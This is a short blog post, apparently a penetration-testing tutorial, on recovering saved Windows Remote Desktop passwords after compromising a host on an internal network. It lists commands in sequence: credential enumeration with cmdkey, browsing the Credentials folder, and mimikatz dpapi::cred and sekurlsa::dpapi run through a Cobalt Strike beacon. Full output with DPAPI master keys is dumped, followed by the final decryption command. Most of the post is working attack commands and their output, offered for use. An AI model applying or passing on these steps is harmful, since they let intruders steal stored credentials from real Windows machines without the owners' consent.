banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

Obtaining Windows Remote Desktop (RDP) Connection Record Password in Internal Network Penetration

Usage conditions: When using mstsc to connect, the administrator has selected the option to automatically save the password connection.

# Suspiciously check if the credentials are saved using cmdkey /list
>cmdkey /list

image

  1. Find local Credentials
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

image

  1. mimikatz
beacon> mimikatz dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\A1AB82F3D34D455BC2EA963AE7B14B85

image

Obtain guidMasterKey {877c4ae6-d114-4851-b9ab-c8d23c7f09a6}

  1. Use sekurlsa::dpapi
beacon> mimikatz sekurlsa::dpapi
[*] Tasked beacon to run mimikatz's sekurlsa::dpapi command
[+] host called home, sent: 788081 bytes
[+] received output:

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-BVVD8VFVMPR$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2022/6/20 12:24:39
SID               : S-1-5-20


Authentication Id : 0 ; 283117 (00000000:000451ed)
Session           : Interactive from 1
User Name         : Administrator
Domain            : WIN-BVVD8VFVMPR
Logon Server      : WIN-BVVD8VFVMPR
Logon Time        : 2022/6/20 12:24:48
SID               : S-1-5-21-2815261350-2957312007-627930173-500
	 [00000000]
	 * GUID      :	{877c4ae6-d114-4851-b9ab-c8d23c7f09a6}
	 * Time      :	2022/6/25 13:14:36
	 * MasterKey :	7ee7b210867c0bb32fe4414c0c56909f1716ec3b40eb2db824aa317701f87a3bae1df728cb513f7f94e34ad50df6915578464ac708ad7c96a30aa3d96dfcc3c0
	 * sha1(key) :	d90d81651dc81f37b34698ac101cf04c094c0cde


Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2022/6/20 12:24:39
SID               : S-1-5-19


Authentication Id : 0 ; 46503 (00000000:0000b5a7)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2022/6/20 12:24:39
SID               : 


Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-BVVD8VFVMPR$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2022/6/20 12:24:39
SID               : S-1-5-18
	 [00000000]
	 * GUID      :	{62dbbb7e-3978-4e4a-bdd4-65a7fa11a0ce}
	 * Time      :	2022/6/25 12:58:55
	 * MasterKey :	54ef76dfc016a1471d59ce8d179ba455a201ca749ace616058b6ef0b8573e558cedb185d57d0bc1be40238da47d16a1124f3a69bbaccaf5f5b2e61bd637e9b73
	 * sha1(key) :	6aff948e5a90e41f2edffd26da163af4f146b1a5
	 [00000001]
	 * GUID      :	{43ea2159-28dc-4507-90bd-751f19e7db5d}
	 * Time      :	2022/6/20 12:24:39
	 * MasterKey :	cc412391998e555e76bfa10964c792fd675b037dec9c5be3b9456db4f5eb64022c0698d6960de4c0a8aca21586f5b445bf490c4a392014721636be5c5f75a3f8
	 * sha1(key) :	56b3c08a69e9c1a346e35fa4cb572b70cf5a158e
	 [00000002]
	 * GUID      :	{0fefdf3f-162a-4a3f-a6df-6ec2dee82eb5}
	 * Time      :	2022/6/25 12:58:55
	 * MasterKey :	89012fd9de4903051a9b99225216df633efd8d1e014624f0a68670432da8fc1fda98babc447d5de1d3fe10069a6358be9a64fb1f634cf6012307465455757369
	 * sha1(key) :	3604ef0e99dab0ea49db307fd8950b8fd0d4d310
	 [00000003]
	 * GUID      :	{3d58f13e-ba7c-4457-835c-5a7f1353590c}
	 * Time      :	2022/6/25 13:12:50
	 * MasterKey :	c12ff664090f806ae980d32bfe19af5ba76f3d5f1dcad46e70da7affaede04c02ba00d5d75380fd4bd77f6cd535be3eec103f2f5048ceee96d61347e3d24d7ba
	 * sha1(key) :	be0643a97d988adcc8e5ae2b3d6df9702df32dc0

Find the masterkey based on guidMasterKey {877c4ae6-d114-4851-b9ab-c8d23c7f09a6}

image

MasterKey:

7ee7b210867c0bb32fe4414c0c56909f1716ec3b40eb2db824aa317701f87a3bae1df728cb513f7f94e34ad50df6915578464ac708ad7c96a30aa3d96dfcc3c0
  1. Decrypt
mimikatz dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\A1AB82F3D34D455BC2EA963AE7B14B85 /masterkey:7ee7b210867c0bb32fe4414c0c56909f1716ec3b40eb2db824aa317701f87a3bae1df728cb513f7f94e34ad50df6915578464ac708ad7c96a30aa3d96dfcc3c0

The cs taowu plugin also has a module that can achieve the same effect, obtaining the password of the remote desktop connection record.

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.